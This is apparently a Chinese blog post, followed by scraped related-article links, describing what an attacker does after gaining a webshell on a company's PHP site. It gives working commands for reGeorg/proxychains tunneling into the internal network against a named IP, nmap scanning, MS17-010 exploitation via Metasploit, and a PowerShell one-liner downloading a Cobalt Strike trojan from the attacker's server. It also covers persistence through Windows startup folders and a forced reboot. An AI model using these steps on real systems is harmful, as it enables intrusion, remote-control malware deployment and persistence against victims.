之前搞站都是搞到后台管理员,或者搞到webshell就宣布结束了,,今天终于有机会学习一下后面的操作了。

公司网站为php的站,已经拿到webshell。可以进行菜刀连接。

菜刀虚拟终端


php -m #查看php是否有socket库,因为reGeory需要用到sockets库。

如果没有sockets,则上传的tunnel.php需要添加dl("php_sockers.dll")

reGeorg + proxychains 代理内网

 reGeorg 本地代理


python reGeorgSocksProxy.py -p 8080 -u http://222.252.10.101:8080/tunnel.php
#将http://222.252.10.101:8080代理到本地的8080端口

然后复制一个终端,proxychains上场。

注意proxychains的配置信息


 vi  /etc/proxychains.conf

添加


socket5 127.0.0.1 8080    #端口为上面配置的port

因为reGeorg使用的sockets协议,只支持tcp,所以没法ping通。


proxychains nmap -sT -Pn  172.168.10.50

看到445端口,就要想到ms17-010呀,你也可以proxychains命令行调用一下Nessus扫一下哈

利用msf获取system权限


proxychains -q msfconsole
#-q 不显示proxychains的回显信息

#use exploit/windows/smb/ms17_010_psexec
#set rhost 172.168.10.50
#run
#shell
进入命令行

powershell下载并运行远控

可以用cobaltstrike生成对应系统的木马,将该木马放在自己已有的服务器上。

直接用powershell将木马从远程服务器下载到目标服务器中。


>powershell $client = new-object System.Net.WebClient;$client.DownloadFile(‘http://自己已有服务器ip/zz.exe’,'c:\zz.exe')

或者如果菜刀的权限比较高,可以直接将木马传到开机启动的路径下;

 

C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
#win7的开机启动路径
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
#win10的开机启动路径
#根据服务器windows版本搜索对应的开机启动文件夹的路径  

若菜刀权限比较低,可先用菜刀把马传到网站根路径下,再用msf-shell将木马复制到开机启动的路径下。因为有些远控马,必须当前用户启动木马后才有更多的功能,所以,先把远控马传到开机启动的路径下面,再msf使目标机器重启,即可达到目的。。。说的比较啰嗦,但这就是我所理解的,,如果有哪里不对,请您留言告诉我哈。

msf重启目标机器//这一步并不一定得操作。。


shutdown -r -t 0
或 reboot

然后,连远控;;

拿到webshell之后的事情的更多相关文章

  1. [转]中国最大的Webshell后门箱子调查,所有公开大马全军覆没

    起因 对这件事情的起因是某天我渗透了一个大站,第二天进webshell时就发现,当前目录出现了新的后门,仔细一查,发现是博彩团伙干的,网站被全局劫持黑帽程序如下代码 set_time_limit(); ...

  2. Java类WebServer及中间件拿webshell方法总结

    0.序 原文名称:Tomcat.Weblogic.JBoss.GlassFish.Resin.Websphere弱口令及拿webshell方法总结 原文from:http://www.hack80.c ...

  3. 当一名黑客获得一份WebShell后,会做什么

    当你获得一份webshell后,你会干嘛? 我曾获得N多webshell.什么discuz.dedecms.phpwind.phpweb.aspcms等等,甚至还包括N多自己研发的线上平台. 可是,问 ...

  4. Deformity ASP/ASPX Webshell、Webshell Hidden Learning

    catalog . Active Server Page(ASP) . ASP.NET . ASP WEBSHELL变形方式 . ASPX WEBSHELL变形方式 . webshell中常见的编码转 ...

  5. Compiler Theory(编译原理)、词法/语法/AST/中间代码优化在Webshell检测上的应用

    catalog . 引论 . 构建一个编译器的相关科学 . 程序设计语言基础 . 一个简单的语法制导翻译器 . 简单表达式的翻译器(源代码示例) . 词法分析 . 生成中间代码 . 词法分析器的实现 ...

  6. 一次完整的从webshell到域控的探索之路

    前言 内网渗透测试资料基本上都是很多大牛的文章告诉我们思路如何,但是对于我等小菜一直是云里雾里. 于是使用什么样的工具才内网才能畅通无阻,成了大家一直以来的渴求. 今天小菜我本着所有师傅们无私分享的精 ...

  7. webshell在php方向的研究(精华篇)

    文章主旨:准备学习c语言,你喜欢的所有干货在文末附件里 作者宗旨:没有不想当将军的兵,没有不想提高技术的person,今天带你打开php的研究之路. 本文作者:Laimooc(原名xoanHn),个人 ...

  8. 利用“进程注入”实现无文件复活 WebShell

    引子 上周末,一个好兄弟找我说一个很重要的目标shell丢了,这个shell之前是通过一个S2代码执行的漏洞拿到的,现在漏洞还在,不过web目录全部不可写,问我有没有办法搞个webshell继续做内网 ...

  9. Tomcat、Weblogic、JBoss、GlassFish、Resin、Websphere弱口令及拿webshell方法总结 [复制链接]

    1.java应用服务器    Java应用服务器主要为应用程序提供运行环境,为组件提供服务.Java 的应用服务器很多,从功能上分为两类:JSP 服务器和 Java EE 服务器.1.1  常见的Se ...

随机推荐

  1. 实现TabControl 选项卡首个标签缩进的方法

    借用一张网图说明需求 在网上找了一圈,没有找到直接通过API或者重绘TabControl 的解决方法,最后灵机一动想到了一个折(tou)中(lan)的解决办法 Tab1.TabPages.Clear( ...

  2. ant design for vue 上传文件

    1.使用customRequest customRequest 通过覆盖默认的上传行为,可以自定义自己的上传实现 Function 定义customRequest,之前定义action行为会被覆盖,可 ...

  3. Shell遍历目前下后缀名为.xml的文件并替换文件内容

    1.shell查找 .xml文件 find /home/esoon/test/external/ -type f -name '*.xml' 2.替换方法 sed -i "s/10.111. ...

  4. 吴裕雄--天生自然C语言开发:约瑟夫生者死者小游戏

    个人在一条船上,超载,需要 人下船. 于是人们排成一队,排队的位置即为他们的编号. 报数,从 开始,数到 的人下船. 如此循环,直到船上仅剩 人为止,问都有哪些编号的人下船了呢? #include&l ...

  5. 分享一个腾讯域名拦截检测api

    接口地址:https://api.oioweb.cn/api/ymjc.php 返回格式:json 请求方式:get 调用示例:https://api.oioweb.cn/api/ymjc.php?u ...

  6. Java常用基本类库总结

    1.String成员方法 boolean equals(Object obj);//判断字符串的内容是否相同,区分大小写. boolean equalsIgnoreCase(String str);/ ...

  7. python之接口开发

    一.接口开发的思路 1.启动一个服务: 2.接受客户端传过来的数据: 3.登录,注册,支付等功能 4.操作数据库,拿到数据: 5.返回数据: import flask server=flask.Fla ...

  8. Jmeter阶梯式压测

    https://www.cnblogs.com/Zfc-Cjk/p/11639219.html 什么是阶梯式压测? 阶梯式压测,就是对系统的压力呈现阶梯性增加的过程,每个阶段压力值都要增加一个数量值, ...

  9. seek for|contrary to|lag behind|take up|take advantage of|be confident of|allow for |

    There are signs ________ restaurants are becoming more popular with families.  A. that  B. which  C. ...

  10. kafka运行找不到或无法加载主类 Files\Java\jdk1.8.0_131\lib\dt.jar;C:\Program

    最近在研究Flink+kafka解决方案, kafka的安装首先需要安装zookeeper,在安装zookeeper是报错找不到或无法加载主类 Files\Java\jdk1.8.0_131\lib\ ...